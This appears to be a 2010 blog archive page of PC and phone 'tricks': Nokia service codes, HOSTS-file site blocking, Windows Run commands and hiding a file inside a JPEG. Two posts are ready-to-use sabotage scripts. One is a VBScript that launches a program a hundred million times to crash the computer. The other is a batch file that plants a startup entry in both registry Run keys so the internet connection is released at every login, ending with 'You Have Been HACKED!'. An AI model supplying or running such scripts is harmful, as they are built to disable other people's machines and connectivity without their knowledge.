Posts

Showing posts from February, 2010

Nokia mobile codes

NOTE:> These Codings apply only for selected Nokia Mobile Phones...>> Imp. Codes Blututh Dev Adrz *#2820# Soft Frmt *#7780# Hard Frmt *#7370# Shw Vrsn *#0000# IMEI *#06# >>CODES DESCRIPTIONS *3370# Activate Enhanced Full Rate Codec (EFR) - Your phone uses the best sound quality but talk time is reduced my approx. 5% #3370# Deactivate Enhanced Full Rate Codec (EFR) *#4720# Activate Half Rate Codec - Your phone uses a lower quality sound but you should gain approx 30% more Talk Time *#4720# Deactivate Half Rate Codec *#0000# Displays your phones software version, 1st Line : software Version, 2nd Line : software Release Date, 3rd Line : Compression Type *#9999# Phones software version if *#0000# does not work *#06# For checking the International Mobile Equipment Identity (IMEI Number) #pw+1234567890+1# Provider Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols) #pw+1234567890+2# Network Lock Status. (u

Block websites without any software

1] Browse C:\WINDOWS\system32\drivers\etc 2] Find the file named "HOSTS" 3] Open it in notepad 4] Under "127.0.0.1 localhost" Add 127.0.0.2 www.orkut.com , and that site will no longer be accessable. 5] Done!

>> This Will Crash Ur Computer

Option Explicit Dim WSHShell Set WSHShell=Wscript.CreateObject("Wscript.Shell") Dim x For x = 1 to 100000000 WSHShell.Run "Tourstart.exe" Next Save It As Anything.vbs

Disable Internet Permanently

>> Save As A bat File echo @echo off>c:windowswimn32.bat echo break off>>c:windowswimn32.bat echo ipconfig/release_all>>c:windowswimn32.bat echo end>>c:windowswimn32.bat reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f echo You Have Been HACKED! PAUSE

Run command

Run Commands ----------------------------------------------------------- START >> RUN Accessibility Controls access.cpl Add Hardware Wizard hdwwiz.cpl Add/Remove Programs appwiz.cpl Administrative Tools control.exe admintools Automatic Updates wuaucpl.cpl Bluetooth Transfer Wizard fsquirt Calculator calc Certificate Manager certmgr.msc Windows Firewall firewall.cpl Try them out..

Hide File In Image

HOw Can We Hide The File In Image . 1. Gather the file you wish to bind, and the image file, and place them in a folder. I will be using C:\New Folder-The image will hereby be referred to in all examples as xyz.jpg-The file will hereby be referred to in all examples as New Text Document.txt 2. Add the file/files you will be injecting into the image into a WinRar .rar or .zip. From here on this will be referred to as (secret.rar) 3. Open command prompt by going to Start > Run > cmd 4. In Command Prompt, navigate to the folder where your two files are by typingcd location [ex: cd C:\New Folder] 5. Type [copy /b xyz.jpg + secret.rar xyz.jpg] (remove the brackets)Congrats, as far as anyone viewing is concerned, this file looks like a JPEG, acts like a JPEG, and is a JPEG, yet it now contains your file. In order to view/extract your file, there are two options that you can take a) Change the file extension from xyz.jpg to xyz.rar, then open and your file is there b) Leave the file ext